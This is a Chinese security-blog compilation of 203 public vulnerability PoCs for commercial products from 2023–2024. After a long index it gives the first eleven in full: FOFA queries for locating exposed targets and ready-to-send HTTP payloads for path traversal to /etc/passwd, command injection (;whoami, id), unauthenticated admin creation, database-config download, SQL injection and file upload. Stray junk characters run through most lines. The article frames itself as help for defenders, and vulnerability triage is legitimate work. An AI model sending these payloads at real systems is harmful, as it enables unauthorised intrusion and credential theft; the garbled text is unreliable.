互联网公开漏洞整理202309-202406
0 D' _* L3 i/ \% p9 k! Y/ R q+ {道一安全 2024-06-05 07:41 北京7 Y. e8 n/ _) V# V/ Q' O+ ]8 i5 L
以下文章来源于网络安全新视界 ,作者网络安全新视界2 m: X: j( r) n8 I. Q" l/ U! ]
2 U, Y: d+ ?; R/ {& Q/ c发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
5 p _1 V! I; i$ a8 x6 n
" g1 e2 z5 F# `) Q5 j/ G漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。# V5 V9 |3 L' h0 B9 _
5 M P3 }9 v& L8 E: [$ j- c; C安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。: S9 o! y$ `' e) D6 ?# r$ i; u, a
$ A2 A6 Y1 E/ x I9 F1 G
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
" e0 G I7 n0 ?7 E) Y0 ]
* j4 a9 R7 I; S4 E( g5 J9 F2 N合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
9 g. ?2 a7 i0 |/ E2 k
5 `' U- o$ j1 A4 B: c
. g* \: o' `+ a声明
" s1 o Z+ `$ o4 u2 j4 q( {+ X O
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
0 ?6 G. O6 e# G( y' w) r- c
; w* s2 s' T8 |8 V0 q6 B6 V有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。8 a+ d% `) k3 P1 K6 a$ D1 U
& ?0 s6 N% @7 T' f& V1 G h; n
5 G* j$ `# N/ _( R. q2 `! e( ?- q
5 e) Y) X) z$ ?: L0 r% J8 S目录- A( |. I& [! D R1 x: k
- A- W v( v' e8 r8 E018 g% o6 f% `$ b; a
0 D4 `' n* L; L6 ~; ]) Q1 z1. StarRocks MPP数据库未授权访问
" a1 E0 p* l% m& ~$ {: o2. Casdoor系统static任意文件读取* a7 q" o( F7 R, h. f4 Y' Y
3. EasyCVR智能边缘网关 userlist 信息泄漏
c) D, o, _$ o) H& w4. EasyCVR视频管理平台存在任意用户添加
) }- F' ]+ \# w+ R1 X5. NUUO NVR 视频存储管理设备远程命令执行
$ j5 _. f* ~: k! p6 K% `$ h8 ^/ U6. 深信服 NGAF 任意文件读取* ^( J& u j6 `0 Y0 L6 G
7. 鸿运主动安全监控云平台任意文件下载# @% o. ~: j5 {4 R, ?) ^) j: ]
8. 斐讯 Phicomm 路由器RCE
( p* g8 v# R( ` z. n9. 稻壳CMS keyword 未授权SQL注入0 u2 n' f9 | o* V; i! y
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
- y9 h( e5 e, M S1 j11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
$ T* P/ n7 I4 _7 a8 O; f# G12. Jorani < 1.0.2 远程命令执行. h/ H) F2 | Q0 W4 T7 c+ x
13. 红帆iOffice ioFileDown任意文件读取( A* _0 J) }+ C
14. 华夏ERP(jshERP)敏感信息泄露
* { y2 m4 P9 J1 D( u! t15. 华夏ERP getAllList信息泄露
h3 E; B8 _; S$ S; L) w16. 红帆HFOffice医微云SQL注入3 M; p$ x, s& z1 ]! D
17. 大华 DSS itcBulletin SQL 注入
* q: A) s+ Y, a& F2 i: d18. 大华 DSS 数字监控系统 user_edit.action 信息泄露: m, E) R. E$ t$ D9 D+ K8 F
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
+ k: ^6 u2 q3 J3 I' }5 H- R$ }20. 大华ICC智能物联综合管理平台任意文件读取
- f5 }9 v/ N; R$ l. s21. 大华ICC智能物联综合管理平台random远程代码执行
: N6 j7 E0 C+ O) f' ]6 ~, ?22. 大华ICC智能物联综合管理平台 log4j远程代码执行7 ?! O) A( q6 L, q4 } i
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行9 k$ y9 O8 x* \, S
24. 用友NC 6.5 accept.jsp任意文件上传0 [% D4 [! S! C/ {# E( w* Z/ X# K
25. 用友NC registerServlet JNDI 远程代码执行
! E+ {) p- F# a/ g7 F; o/ R% J: H26. 用友NC linkVoucher SQL注入7 x5 B( l' V. A9 B. w
27. 用友 NC showcontent SQL注入5 Z! t7 p9 |: Y8 v; n4 l9 q
28. 用友NC grouptemplet 任意文件上传
5 Z3 P+ p$ e0 P5 J' \29. 用友NC down/bill SQL注入
" z" H* B1 e' h( O30. 用友NC importPml SQL注入
, @9 j9 p, L. G/ Y31. 用友NC runStateServlet SQL注入 h+ l, j- o" C* f$ _' `
32. 用友NC complainbilldetail SQL注入
1 h: C* D. o+ X# m33. 用友NC downTax/download SQL注入2 m0 h+ C3 `% Z: `8 W: E
34. 用友NC warningDetailInfo接口SQL注入) b' ~, u/ f' d, _+ I
35. 用友NC-Cloud importhttpscer任意文件上传 d( `( g& \. Z3 u3 e0 p1 {" U
36. 用友NC-Cloud soapFormat XXE
4 s) T0 @, [9 y6 u# m% e" ]37. 用友NC-Cloud IUpdateService XXE
# y9 i1 g# ]' y38. 用友U8 Cloud smartweb2.RPC.d XXE
f$ C( y( X9 X; n4 V7 j( `" ~# M39. 用友U8 Cloud RegisterServlet SQL注入: J- H! U ?) R
40. 用友U8-Cloud XChangeServlet XXE
$ V7 y* K1 q. g, F: x41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
, H0 Z' ?' W/ W# R" p7 X42. 用友GRP-U8 SmartUpload01 文件上传
, f3 t& k- d, K# P* K8 d! o$ U/ g% F43. 用友GRP-U8 userInfoWeb SQL注入致RCE o7 I1 V% ?% l1 ~0 k _
44. 用友GRP-U8 bx_dj_check.jsp SQL注入% Z; {7 s0 H$ O g( r! O+ x5 V& Z
45. 用友GRP-U8 ufgovbank XXE6 }& C+ l5 f8 k* G
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
; V$ \ @! w* d5 a# L47. 用友GRP A++Cloud 政府财务云 任意文件读取- _- V" b! k; U
48. 用友U8 CRM swfupload 任意文件上传
) S- p$ I+ ?. H* [# X3 F: F: _49. 用友U8 CRM系统uploadfile.php接口任意文件上传3 _& c9 z1 e' D6 k. J$ Y) a J
50. QDocs Smart School 6.4.1 filterRecords SQL注入( S/ r( |2 f; A V
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
& P9 _1 f8 G: U! S52. 泛微E-Office json_common.php sql注入
4 l) m! B; W: Y$ @53. 迪普 DPTech VPN Service 任意文件上传
- P3 E7 ?; S3 }3 A8 N3 n54. 畅捷通T+ getstorewarehousebystore 远程代码执行
& i; G& J5 H7 A. y' g55. 畅捷通T+ getdecallusers信息泄露+ L1 A% F& d4 _# C: N
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE8 V8 ]5 c; x' Q
57. 畅捷通T+ keyEdit.aspx SQL注入
7 w7 s9 K2 k, b- e( D+ b58. 畅捷通T+ KeyInfoList.aspx sql注入* S* l7 O# p* a/ T+ d8 X
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行* g2 B* |) m# p& a9 Y& v5 r
60. 百卓Smart管理平台 importexport.php SQL注入
& }3 W2 i5 a' _( E/ h61. 浙大恩特客户资源管理系统 fileupload 任意文件上传4 S$ c+ b* \0 f- D/ J
62. IP-guard WebServer 远程命令执行
* t: C# S! z9 M1 h) }63. IP-guard WebServer任意文件读取
2 F! L3 C2 y, P9 E. Z. H+ d1 X1 m* R# l64. 捷诚管理信息系统CWSFinanceCommon SQL注入( z7 | a$ K# D3 E" c$ u
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过6 E4 c5 O$ I$ ^" F
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入8 e& s* T) C. g2 m1 K
67. 万户ezOFFICE wpsservlet任意文件上传
. y& I0 f! A5 b2 o- o2 o4 ~68. 万户ezOFFICE wf_printnum.jsp SQL注入
& e: W1 V, h) L( K- j( s: i69. 万户 ezOFFICE contract_gd.jsp SQL注入" f" m2 h- f1 h* g( D
70. 万户ezEIP success 命令执行! J- d9 n# F$ M6 u2 h
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入/ ?, k; [; J5 Q2 k! {2 v
72. 致远OA getAjaxDataServlet XXE1 y8 U1 G# o2 A0 `3 H6 B
73. GeoServer wms远程代码执行
# {/ f7 |" y& M) G/ X5 X* ~74. 致远M3-server 6_1sp1 反序列化RCE: C! M) S; c, V/ x
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
9 E9 O) l4 \" X u" m, R! o76. 新开普掌上校园服务管理平台service.action远程命令执行
+ R0 m( k& c, r O' C7 \77. F22服装管理软件系统UploadHandler.ashx任意文件上传: a+ s3 P1 @* k: |
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
, _& e+ V' p" J+ @2 W. x79. BYTEVALUE 百为流控路由器远程命令执行
* b+ J4 S, q* z/ m9 L* B( B80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
! e' A9 ~+ Z* O$ d0 E& r0 _' O81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
; P- r& f& d; G9 \82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
$ j" {. Z3 e. _' L4 o, @# x83. JeecgBoot testConnection 远程命令执行
* F# h6 o( d. ?6 m4 g84. Jeecg-Boot JimuReport queryFieldBySql 模板注入. }- C o4 P& i+ n) I+ d
85. SysAid On-premise< 23.3.36远程代码执行1 Q" r1 L( N4 q
86. 日本tosei自助洗衣机RCE
+ B& ^: p: d$ \! y87. 安恒明御安全网关aaa_local_web_preview文件上传" e: C" I2 k% `6 T
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行* D9 J9 p& H1 ]
89. 致远互联FE协作办公平台editflow_manager存在sql注入, D8 w% g e) ]; R
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行+ x( v' Y# T6 [. \- f% D' h6 r
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
1 V0 e8 @/ S, o8 d3 r. j92. 海康威视运行管理中心session命令执行$ g; V$ M1 [ a% Z5 b0 J
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
" m4 I% b3 g1 }' z( `+ V94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
. K7 w& F- O# B8 c+ n95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
7 u7 I9 ?& O' q* n96. Apache OFBiz 18.12.11 groovy 远程代码执行
" U; e# j+ V8 E" v97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行" g. `/ @% ]3 k4 Y' E# u* M" g
98. SpiderFlow爬虫平台远程命令执行
, E D! Z1 P- T! X99. Ncast盈可视高清智能录播系统busiFacade RCE" F; j# @, d$ E2 Y0 r/ |2 z
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传4 T" J* D7 }# t9 h4 R: I! \
101. ivanti policy secure-22.6命令注入9 e8 n5 o( ^. b; K9 y
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行; }$ D- I6 z: x' f* k
103. Ivanti Pulse Connect Secure VPN XXE
0 @% \8 o' v8 y9 x104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露8 ]- W1 D; g; x C$ Y
105. SpringBlade v3.2.0 export-user SQL 注入
: V$ f0 e3 t) Q! f! C* l. O106. SpringBlade dict-biz/list SQL 注入" q/ X! i# ~+ t- l
107. SpringBlade tenant/list SQL 注入4 ^9 b/ Z& F+ d( w7 R9 f
108. D-Tale 3.9.0 SSRF: g4 H# P, k6 @% ?# @( u6 H
109. Jenkins CLI 任意文件读取
( P. {9 x9 G8 |, ^* Z: D110. Goanywhere MFT 未授权创建管理员
7 c7 d1 O$ B% O) G& C111. WordPress Plugin HTML5 Video Player SQL注入
4 t, h/ ]7 ~/ }# X0 F8 a1 i5 U- D112. WordPress Plugin NotificationX SQL 注入
5 f, G2 ^8 |. M- k113. WordPress Automatic 插件任意文件下载和SSRF
. B+ W4 ?. K/ J& x8 T# T114. WordPress MasterStudy LMS插件 SQL注入7 `" t2 A6 }2 [ e# ^
115. WordPress Bricks Builder <= 1.9.6 RCE7 E& J1 K( O8 p, d
116. wordpress js-support-ticket文件上传8 y% C( E( j( @/ n
117. WordPress LayerSlider插件SQL注入
* [& [& [. E5 z$ Y7 V# S/ Y118. 北京百绰智能S210管理平台uploadfile.php任意文件上传5 E% z |8 T' f9 |
119. 北京百绰智能S20后台sysmanageajax.php sql注入. t6 L" N$ I2 a H4 W. w
120. 北京百绰智能S40管理平台导入web.php任意文件上传! q% o1 z. W! n4 a$ L0 q7 d0 t
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
- q2 Q# O' W6 R2 j" s- ], }122. 北京百绰智能s200管理平台/importexport.php sql注入2 t- w7 X9 T: R+ d8 K! J& j5 P5 S
123. Atlassian Confluence 模板注入代码执行: `9 X4 G2 y% R# R' O
124. 湖南建研工程质量检测系统任意文件上传 C6 j1 r9 S4 s! y, z, e5 u0 t1 ?
125. ConnectWise ScreenConnect身份验证绕过( H! [) ~! {8 v: R, ~( f3 p
126. Aiohttp 路径遍历
9 d' R! V/ E$ I7 R, x3 f/ z127. 广联达Linkworks DataExchange.ashx XXE# U/ h9 j! U) V$ g ~2 Q/ ^1 y
128. Adobe ColdFusion 反序列化7 `0 e0 j/ l) p Z- d" ^
129. Adobe ColdFusion 任意文件读取6 l! E. |# t0 O" B8 ?0 D
130. Laykefu客服系统任意文件上传
3 g. F) ^; \9 V131. Mini-Tmall <=20231017 SQL注入) {' @0 ^; T" ?/ w7 ^' |) T
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
1 [3 Q% b- b, b- {. ^" F. m+ m# |133. H5 云商城 file.php 文件上传0 k2 F6 H# L; l
134. 网康NS-ASG应用安全网关index.php sql注入
n5 d& J1 C; h P/ m3 ~135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入2 G% [0 [( C8 E
136. NextChat cors SSRF. ~+ y1 b8 f- Y* {
137. 福建科立迅通信指挥调度平台down_file.php sql注入; F& B) Z- l- ?$ {/ Q
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
: X. |# ] z4 i. Z$ L+ X) U139. 福建科立讯通信指挥调度平台editemedia.php sql注入9 H8 s5 V& G) U. h( f
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入 l; H; h. O, y
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入# R% i/ D4 p4 r# q) g
142. CMSV6车辆监控平台系统中存在弱密码9 i6 y7 `' B+ R% j w; x
143. Netis WF2780 v2.1.40144 远程命令执行* d1 ] h$ C- a
144. D-Link nas_sharing.cgi 命令注入, U( X e( s0 C0 u$ K
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
& o1 {$ X, L! s$ C) v146. MajorDoMo thumb.php 未授权远程代码执行3 P, Z( m4 \! v# H+ \- c% o
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历& [& x9 Z# W) p: }0 i
148. CrushFTP 认证绕过模板注入
8 o$ k" U/ Q' w$ [149. AJ-Report开源数据大屏存在远程命令执行
# p0 q# ]7 `) x/ w4 u150. AJ-Report 1.4.0 认证绕过与远程代码执行/ G% N! _# k$ O( H
151. AJ-Report 1.4.1 pageList sql注入
- z& K( T) m- `/ b z) T9 C; ?3 T152. Progress Kemp LoadMaster 远程命令执行) i* T' C" W/ \& ` x- H
153. gradio任意文件读取( p _% M2 |5 _1 t) \
154. 天维尔消防救援作战调度平台 SQL注入
# U+ ?6 k; P, k+ f155. 六零导航页 file.php 任意文件上传
! E# ~# P" Q0 J2 h3 l# b1 f156. TBK DVR-4104/DVR-4216 操作系统命令注入
/ H/ R" N3 J% |2 P/ ]( Z- I157. 美特CRM upload.jsp 任意文件上传! d9 X1 m0 {- S+ b
158. Mura-CMS-processAsyncObject存在SQL注入 m1 O3 Q+ i! u5 S; |1 o6 t0 B. T" {
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
; k: t7 E; ~" r% m& b160. Sonatype Nexus Repository 3目录遍历与文件读取1 ^4 h& \3 I6 d8 D7 r5 N% f
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
" s n% @0 d/ g162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传, S; ~) m# G# x7 H% j
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
) c3 w C, F# [4 W( R4 ~; {164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传& Z% c- S5 |5 H: y
165. OrangeHRM 3.3.3 SQL 注入
$ e* {! J) T/ Q5 {4 i- V- P4 t166. 中成科信票务管理平台SeatMapHandler SQL注入
! i! ] U$ b+ r+ o: I% m167. 精益价值管理系统 DownLoad.aspx任意文件读取6 X. b* {) o$ j4 P! \; H% P
168. 宏景EHR OutputCode 任意文件读取2 `' P9 x' \" u/ a2 d
169. 宏景EHR downlawbase SQL注入. s+ D4 r% d2 c4 O
170. 宏景EHR DisplayExcelCustomReport 任意文件读取2 F1 e7 h9 \6 `) i# d5 o
171. 通天星CMSV6车载定位监控平台 SQL注入8 ?7 x% [9 S3 i: P8 j8 n! O( R2 O
172. DT-高清车牌识别摄像机任意文件读取
5 B: g9 j6 H9 G7 I) i) k, W173. Check Point 安全网关任意文件读取
- |; _2 c9 g! @3 d174. 金和OA C6 FileDownLoad.aspx 任意文件读取% k6 m8 X( O1 _
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
1 }/ T+ ], |/ {8 A& x8 G176. 电信网关配置管理系统 rewrite.php 文件上传/ B6 Q" x* g n/ Y
177. H3C路由器敏感信息泄露
& _! c* r8 G" u: u# V' x; s1 H2 n/ p178. H3C校园网自助服务系统-flexfileupload-任意文件上传9 M9 w' I" j/ r+ b3 {
179. 建文工程管理系统存在任意文件读取; t% X6 t& B9 S2 r7 O
180. 帮管客 CRM jiliyu SQL注入
/ O% @/ w- |' D4 W9 t0 e1 v4 D181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
5 s& Q( S- K4 N( Q: P3 f/ H4 P182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建' Y) E+ E9 U/ u& |
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
, D5 |4 |3 ~& s4 y" a! L. X184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加( G2 p7 |/ x8 o9 M
185. 瑞友天翼应用虚拟化系统SQL注入+ U9 b2 t V8 q2 L
186. F-logic DataCube3 SQL注入
+ ?. x. X. b( N4 n187. Mura CMS processAsyncObject SQL注入% F" m [+ b2 x; h* R# C g
188. 叁体-佳会视频会议 attachment 任意文件读取
1 [: b" |+ ]- ]2 y7 `189. 蓝网科技临床浏览系统 deleteStudy SQL注入& d5 @1 h' h1 B- D! l: Q
190. 短视频矩阵营销系统 poihuoqu 任意文件读取4 \* M$ n- @0 N/ ~+ P* g! \( D
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入' u; o( T% e( R* @+ V& w/ b
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
% w* c- O8 I& n+ B3 {: W* \. D193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
% V7 n* d# k. H b194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传* l: O" ?9 V& H& B0 ^$ @9 n" N' v. ?
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
/ F, `# H; L: K/ k# c196. 河南省风速科技统一认证平台密码重置' t# Z& V: O. {% w G0 Q: E
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入/ D# I8 L+ }* i/ Z# F: k: Y! l
198. 阿里云盘 WebDAV 命令注入3 e& S% k4 F0 g# y* ~# h% W8 [
199. cockpit系统assetsmanager_upload接口 文件上传. z5 h" {8 _1 x5 k6 l
200. SeaCMS海洋影视管理系统dmku SQL注入# Z. L# i% A. R" o- h! j
201. 方正全媒体新闻采编系统 binary SQL注入
$ O0 ^ d* e" f" }202. 微擎系统 AccountEdit任意文件上传
5 K% Y$ w* u5 M' B203. 红海云EHR PtFjk 文件上传
2 l+ E/ T! }# X7 M ?# d
) f3 {' x# y2 b& A1 a: Q* ]POC列表' C0 v6 w! n! }, F' C. M
& D8 H* l% J0 E" o d% R) `
022 ^5 s. K5 t" y6 w+ s2 P. q2 X
, U8 D2 k# ^* Y' O$ [
1. StarRocks MPP数据库未授权访问
# y6 v: g; V& R0 S' ?4 AFOFA :title="StarRocks"
4 n2 s% ~0 O- B0 jGET /mem_tracker HTTP/1.1
0 p& ?1 Q6 K' D* k9 EHost: URL1 F! u. H+ q; X0 X
: m* J7 E. }, V( x% @
) P4 j% ^1 b9 t1 X% L4 H5 A4 V- v2. Casdoor系统static任意文件读取/ O/ ]7 g/ s8 ^7 W
FOFA :title="Casdoor" n& S" y$ Z- e6 y" o; }1 B
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
; [2 e; |( j* J- y+ J' O& YHost: xx.xx.xx.xx:99991 ^: g$ _2 E( z7 A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ y$ V+ s6 ?7 \/ k; ?& |# K0 f: AConnection: close. r9 h) l4 O& [* ?5 S1 x
Accept: */*& b' A& F( s7 K8 u) E0 v9 @- N
Accept-Language: en3 ~! _; m$ m7 G' G! Z
Accept-Encoding: gzip7 v- ?0 S; n) I1 ?
7 a* p- y. @1 ~4 c- H* E
5 D; U; M. }8 f, Z, U# ^3. EasyCVR智能边缘网关 userlist 信息泄漏
+ t- s9 T) I, t4 T4 e4 b: P% ]FOFA :title="EasyCVR"* s4 ?8 Y) K+ `( r+ Q- A
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
* S1 a; o1 U3 I$ vHost: xx.xx.xx.xx
- W' S* T- `) W+ t' |: L2 K) J5 m
( N* O' a+ a6 n1 ~! V: `6 O4 g5 y& Z
4. EasyCVR视频管理平台存在任意用户添加" Y0 w/ _/ I4 a' ~9 Z
FOFA :title="EasyCVR"
7 \1 |6 L% u0 a9 G8 R( n0 P$ p; P, R- n* X r
password更改为自己的密码md5. p5 {3 [4 c# r+ ?* y, A
POST /api/v1/adduser HTTP/1.1
! f; i5 |# Z- M" j sHost: your-ip/ t( u/ w+ f- `
Content-Type: application/x-www-form-urlencoded; charset=UTF-88 h! v2 g$ x4 L9 C0 F! b% v$ o
2 p7 N0 e% K8 _3 M2 @name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
: \5 X) b0 P1 e/ B7 g
& ]" j6 H$ F% u
. ]; R; `/ Y6 k# w9 a: _. l2 f% E5. NUUO NVR 视频存储管理设备远程命令执行/ E6 r' x% ?- J; _. z: Q
FOFA:title="Network Video Recorder Login"7 Z- r; } d+ _& O( o0 D- T7 b
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
8 c0 n8 a |4 |, gHost: xx.xx.xx.xx9 g. A# y% R" I9 d. i2 G
3 }* `3 C) G# i
$ l# P9 w1 c7 }! r. k$ N
6. 深信服 NGAF 任意文件读取, i V; b1 p j$ w3 N# f9 Q+ a
FOFA:title="SANGFOR | NGAF" r \$ Y: U5 u0 c
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
, Z' P: Q7 e9 Z' NHost:* x4 O) X4 F4 @
. Q3 W- |' G* r( g
/ U1 \% K0 I) S7. 鸿运主动安全监控云平台任意文件下载' G, H* V' k \3 E# l1 M/ L( ?
FOFA:body="./open/webApi.html"' K5 t5 u* C7 O6 L
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1# y9 i6 G: L& q
Host:
- Q7 N3 g) d9 |9 L j" X* o% k
p0 [5 v7 a( w
" o/ ~# t' [/ i" F6 \. r8. 斐讯 Phicomm 路由器RCE
9 r( C: {, Q9 V: {* nFOFA:icon_hash="-1344736688"( K6 `) g9 B1 I2 r* `; ^1 v0 q( K
默认账号admin登录后台后,执行操作/ l* u0 [/ i3 J
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.10 v9 Y& K; S5 I" [
Host: x.x.x.x
& N5 K3 u6 l7 \: lCookie: sysauth=第一步登录获取的cookie$ q/ x) w, O! A( X2 M: U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
* q( {1 [; |# p |# W* T- QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
( l' k' O$ J3 y9 n" Q v* b2 c3 B0 T8 ]7 }# u
------WebKitFormBoundaryxbgjoytz
& Q( G" B7 D$ u# \2 v- d E, DContent-Disposition: form-data; name="wifiRebootEnablestatus"2 e4 [/ }5 I$ F+ x3 _9 q# g
& \. P. r0 D2 p I. Z7 {
%s; V# m" F1 G* x5 `2 G# g2 k
------WebKitFormBoundaryxbgjoytz/ W, O( {, P1 Y) j5 L% D. u
Content-Disposition: form-data; name="wifiRebootrange" X' s( b0 ^8 h& Q" H" H+ v/ Q
3 h. R0 X0 F. a: x12:00; id;
2 l. ^9 X* l4 `- G. E4 ? i. M% w------WebKitFormBoundaryxbgjoytz* d, [2 x: S' R
Content-Disposition: form-data; name="wifiRebootendrange"4 ^3 Z+ B8 c. x, x7 a
- R7 H! N) [) l/ z6 O: u
%s:
* I7 ?, h& g1 e+ p. J, a------WebKitFormBoundaryxbgjoytz# }4 @$ }% B" w) v) |; A7 j5 }
Content-Disposition: form-data; name="cururl2". Q5 X' Q9 G8 {' u
, P# \, l, a6 c* l" g
8 \, B, a1 i( G3 d b
------WebKitFormBoundaryxbgjoytz--
! a3 E, F R- I# C4 c/ k6 P) S$ C' n# ^
' k- l& x% m8 {! X
9. 稻壳CMS keyword 未授权SQL注入 j5 l6 U+ r8 X1 U
FOFA:app="Doccms"8 M. S* D8 _: S/ H" m4 i
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
O6 c; j% d5 [, oHost: x.x.x.x+ a0 Q# X$ W4 Z3 L; s! v
) y3 H& t8 O. x2 y* b4 _1 I5 z, `/ y6 i0 {
payload为下列语句的二次Url编码+ F$ k4 T b, a: W
' [6 W; K% [( J8 s. I- T$ |
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
$ f) J+ }/ E3 m$ d' X( h
. o$ Q5 p7 t3 c- w10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
H) |( s% T- T. X9 n# GFOFA:icon_hash="953405444". `: ? z; Q/ r3 X
+ Y, C4 m4 T: q& F/ t- J" C# }
文件上传后响应中包含上传文件的路径
; W E" c3 p9 K J4 A/ EPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
$ R: J e" C3 w; `3 |$ vHost: x.x.x.x:xx
) [: ~ g3 F0 z( b( MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
" ]) l) Z; N+ E8 f' S% l, Y" ?5 ]; RContent-Length: 197$ t2 E4 I9 l: w/ s1 h) ~% O& c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9; S5 u1 y4 Z% ^8 I9 _6 y7 O+ N, u, C8 P
Accept-Encoding: gzip, deflate
" ~9 U! F/ }- }9 e' h' K" pAccept-Language: zh-CN,zh;q=0.95 p0 u) @7 d9 K# E9 A4 |$ G
Connection: close
$ G6 T3 e$ A' }+ ^7 `Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu) F( b- F# ]; p! F! @
" l# { C& X% y: g4 p0 Y! _& q
------WebKitFormBoundaryxdgaqmqu2 W) K U6 X' g {- ?1 k* k/ K
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
4 v% ] U. n, FContent-Type: text/html
! O! a+ G% D# C2 m- @0 }2 W. z% C2 f6 ~( E
jmnqjfdsupxgfidopeixbgsxbf
3 a6 n7 O& a, B! V6 B+ z------WebKitFormBoundaryxdgaqmqu--
( A! ~9 S/ \/ v) q% ?+ i
; Y6 M4 }# l# ?' \4 ~( n' V, l2 r1 s& t* o/ Q" K* c- Q: T
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
1 E5 i3 m; Z8 E! `9 e( D3 f; RFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
1 d! M# |7 l- Y& M- U; lGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
( e4 U& V( ~7 g: y' a% QHost: 127.0.0.11 ^* ^1 D& a) Y+ o" X3 j5 f N
